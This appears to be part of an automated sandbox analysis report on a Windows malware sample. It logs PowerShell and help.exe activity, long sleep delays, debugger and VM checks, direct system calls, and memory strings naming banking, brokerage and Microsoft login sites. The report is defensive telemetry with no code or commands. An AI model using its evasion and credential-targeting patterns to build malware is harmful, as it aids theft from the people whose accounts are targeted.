Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\help.exe	API/Special instruction interceptor: Address: 7FF84F7AD324
Source: C:\Windows\SysWOW64\help.exe	API/Special instruction interceptor: Address: 7FF84F7AD7E4
Source: C:\Windows\SysWOW64\help.exe	API/Special instruction interceptor: Address: 7FF84F7AD944
Source: C:\Windows\SysWOW64\help.exe	API/Special instruction interceptor: Address: 7FF84F7AD504
Source: C:\Windows\SysWOW64\help.exe	API/Special instruction interceptor: Address: 7FF84F7AD544
Source: C:\Windows\SysWOW64\help.exe	API/Special instruction interceptor: Address: 7FF84F7AD1E4
Source: C:\Windows\SysWOW64\help.exe	API/Special instruction interceptor: Address: 7FF84F7B0154
Source: C:\Windows\SysWOW64\help.exe	API/Special instruction interceptor: Address: 7FF84F7ADA44

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Memory allocated: 870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Memory allocated: 2580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Memory allocated: 4580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Memory allocated: 9100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Memory allocated: 8C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Memory allocated: A100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Memory allocated: B100000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 239875	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 239765	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 239655	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 239546	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 239437	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 239317	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 239182	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 239078	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 238960	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 238859	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Window / User API: threadDelayed 1276	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Window / User API: threadDelayed 438	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5582	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2770	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Window / User API: threadDelayed 365	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Window / User API: threadDelayed 9607	Jump to behavior

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\help.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 6976	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 6976	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 6976	Thread sleep time: -239875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 6976	Thread sleep time: -239765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 6976	Thread sleep time: -239655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 6976	Thread sleep time: -239546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 6976	Thread sleep time: -239437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 6976	Thread sleep time: -239317s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 6976	Thread sleep time: -239182s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 6976	Thread sleep time: -239078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 6976	Thread sleep time: -238960s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 6976	Thread sleep time: -238859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe TID: 4352	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8552	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8540	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 8900	Thread sleep count: 365 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 8900	Thread sleep time: -730000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 8900	Thread sleep count: 9607 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 8900	Thread sleep time: -19214000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe TID: 9020	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe TID: 9020	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe TID: 9020	Thread sleep time: -55500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe TID: 9020	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe TID: 9020	Thread sleep time: -41000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed

Source: help.exe, 0000000C.00000002.3757090820.00000000079E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ive Brokers - GDCDYNVMware20,11696428655p
Source: 728o34HL.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: help.exe, 0000000C.00000002.3757090820.00000000079E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,'*
Source: 728o34HL.12.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 728o34HL.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 728o34HL.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 728o34HL.12.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 728o34HL.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Q1NBabd2fJUnEL1mh.exe, 00000010.00000002.3753296295.00000000007B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: 728o34HL.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 728o34HL.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 728o34HL.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 728o34HL.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 728o34HL.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 728o34HL.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 728o34HL.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 728o34HL.12.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 728o34HL.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: help.exe, 0000000C.00000002.3752377980.0000000002AAE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.1809112806.000001F82207D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: help.exe, 0000000C.00000002.3757090820.00000000079E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n PasswordVMware20,11696428655
Source: 728o34HL.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 728o34HL.12.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 728o34HL.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 728o34HL.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 728o34HL.12.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 728o34HL.12.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 728o34HL.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 728o34HL.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 728o34HL.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 728o34HL.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 728o34HL.12.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 728o34HL.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 728o34HL.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: AAHiVVNIKQESryT.exe, 00000004.00000002.1334415949.0000000006E22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}AQt
Source: 728o34HL.12.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 728o34HL.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 728o34HL.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtQuerySystemInformation: Direct from: 0x772748CC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtQueryVolumeInformationFile: Direct from: 0x77272F2C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtOpenSection: Direct from: 0x77272E0C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtClose: Direct from: 0x77272B6C
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtReadVirtualMemory: Direct from: 0x77272E8C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtCreateKey: Direct from: 0x77272C6C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtSetInformationThread: Direct from: 0x77272B4C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtQueryAttributesFile: Direct from: 0x77272E6C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtAllocateVirtualMemory: Direct from: 0x772748EC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtQueryInformationToken: Direct from: 0x77272CAC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtTerminateThread: Direct from: 0x77272FCC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtOpenKeyEx: Direct from: 0x77272B9C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtDeviceIoControlFile: Direct from: 0x77272AEC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtQueryValueKey: Direct from: 0x77272BEC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtProtectVirtualMemory: Direct from: 0x77267B2E	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtCreateFile: Direct from: 0x77272FEC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtOpenFile: Direct from: 0x77272DCC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtWriteVirtualMemory: Direct from: 0x77272E3C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtMapViewOfSection: Direct from: 0x77272D1C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtResumeThread: Direct from: 0x772736AC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtProtectVirtualMemory: Direct from: 0x77272F9C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtSetInformationProcess: Direct from: 0x77272C5C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtNotifyChangeKey: Direct from: 0x77273C2C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtCreateMutant: Direct from: 0x772735CC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtSetInformationThread: Direct from: 0x772663F9	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtQueryInformationProcess: Direct from: 0x77272C26	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtResumeThread: Direct from: 0x77272FBC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtCreateUserProcess: Direct from: 0x7727371C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtWriteVirtualMemory: Direct from: 0x7727490C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtOpenKeyEx: Direct from: 0x77273C9C	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtAllocateVirtualMemory: Direct from: 0x77272BFC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtReadFile: Direct from: 0x77272ADC	Jump to behavior
